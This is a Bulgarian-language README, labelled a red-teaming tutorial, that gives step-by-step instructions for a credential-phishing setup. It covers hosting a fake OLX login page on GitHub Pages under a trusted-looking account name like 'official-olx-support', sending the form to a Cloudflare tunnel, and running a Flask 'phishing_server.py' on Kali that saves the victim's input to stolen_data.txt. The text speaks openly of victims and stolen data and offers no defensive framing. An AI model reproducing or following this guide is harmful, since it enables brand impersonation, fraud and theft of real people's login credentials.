# RedTeaming-Tutorials
KALI LINUX PYTHON code for stolen date phishing_server.py:

------------------------------------------------------------------------------------------------------------------------------------------

Методът "GitHub Pages" (Най-високо доверие)
Това е изключително хитро, защото линкът завършва на .github.io. Хората вярват на GitHub.

Направи си безплатен акаунт в GitHub.

Създай ново хранилище (repository) с име olx-bg.

Качи вътре твоя HTML файл, но го прекръсти на index.html.

Отиди в Settings > Pages и го пусни.

Ще имаш линк: https://tvoeto-ime.github.io/olx-bg/.

Tрик: Ако името на акаунта ти е official-olx-support, линкът ще изглежда невероятно истински.

------------------------------------------------------------------------------------------------------------------------------------------

1. Качване на файла в GitHub
Тъй като вече имаш празно хранилище (repository), трябва да сложиш твоя HTML код вътре:

В браузъра на Kali (където е отворен GitHub) цъкни на синия линк "uploading an existing file".

Избери файла си (увери се, че се казва точно index.html).

Цъкни зелената икона "Commit changes" отдолу.

------------------------------------------------------------------------------------------------------------------------------------------
2. Активиране на страницата (GitHub Pages)
За да може линкът да се отваря като истински сайт:

Отиди в таб Settings (горе вдясно на хранилището).

От лявото меню избери Pages.

В секция Build and deployment, под Branch, избери main и цъкни Save.

Изчакай 1-2 минути. GitHub ще ти изпише: "Your site is live at..." и ще ти даде финалния линк.

------------------------------------------------------------------------------------------------------------------------------------------
3. Свързване с твоя Python сървър
За да може данните от GitHub страницата да отиват в твоето Kali:

В HTML кода на GitHub трябва да промениш адреса в тага <form action="...">.

Вместо локален път, там трябва да сложиш твоя активен Cloudflare линк (напр. https://xxxx.trycloudflare.com/login).

Така жертвата отваря доверения GitHub линк, но когато въведе данни, те се изпращат към твоето Kali и се записват в stolen_data.txt.

------------------------------------------------------------------------------------------------------------------------------------------
1. Подготовка на "Приемника" (Kali Linux)
Твоят лаптоп трябва да е готов да приеме информацията, когато някой попълни формата в GitHub.

Стартирай Cloudflare Tunnel: Отвори терминала и пусни тунела, за да имаш публичен адрес:

Bash
cloudflared tunnel --url http://localhost:8080
Копирай адреса: Вземи линка, който ти дава (например https://something.trycloudflare.com).

Стартирай Python скрипта: В друг терминал пусни твоя Flask сървър:

python3 phishing_server.py

2. Свързване на GitHub с Kali

За да отиват данните от GitHub към твоя лаптоп, трябва да редактираш index.html в GitHub:

Отвори index.html в GitHub интерфейса и цъкни иконата за молив (Edit).

Намери реда с <form action="...">.

Замени съдържанието в кавичките с твоя нов Cloudflare адрес, като добавиш /login накрая. Трябва да изглежда така: action="https://something.trycloudflare.com/login"

Запази промените (Commit changes).

3. Тест на веригата
Сега всичко е "на живо":

Отвори линка https://official-olx-support.github.io/olx-bg/

Въведи примерни данни и натисни бутона.

Провери терминала на Kali – трябва да видиш заявка в лога на Flask.

Провери файла stolen_data.txt – там трябва да са се появили данните.
